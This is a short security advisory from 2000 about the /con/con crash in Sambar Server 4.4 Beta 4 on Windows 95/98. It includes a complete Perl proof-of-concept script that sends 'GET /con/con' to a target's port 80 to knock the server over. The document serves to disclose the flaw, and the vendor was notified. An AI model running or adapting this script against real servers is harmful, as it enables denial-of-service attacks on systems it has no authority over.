daemon-root's security research Advisory Name: dae_sambar44b4 Release Date: 10 November 2000 Application: Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com) Platform: Windows 95, 98 Severity: The server is still vulnerable for the infamous /con/con exploit Author: daemon-root (daemon_r00t@secureroot.com) Web: http://www.daemon-root.da.ru Overview: Sambar Server is a free, multithreaded HTTP server for Windows 95/NT. Its features include HTTP proxy, search engine, log analysis, security, server-side scripting, and DLLs. This program includes an unbuffered CGI support, native FTP proxy, a sacrypt encryption utility, and significantly faster full-text indexing, yet it's still vulnerable for the infamous /con/con exploit such as in the previous versions of Sambar Server. Proof of concept code: [dae_sambar44.pl] # Sambar Server 4.4 Beta 4 Windows /con/con Exploit # # Bad Perl Code by: daemon-root # Website: http://www.daemon-root.da.ru # # This is for EDUCATION purposes ONLY! use IO::Socket; print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n"; print "=================================================\n"; if (not $ARGV[0]) { print "Usage: $0 [host]\n\n"; exit(0); } sub connecthost { $host = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ARGV[0], PeerPort => "80",) or die "Can't open connection to $ARGV[0] because $!\n"; $host->autoflush(1); } $exploit .= "/con/con"; print "\nOpen connection...\n"; &connecthost; print "Sending characters...\n"; print $host "GET $exploit HTTP/1.0\n"; print "close connection...\n"; close $host; [END OF dae_sambar44.pl] Vendor status: The vendor has been informed on 10 november 2000. ______________________________________________________________ daemon-root's security research - http://www.daemon-root.da.ru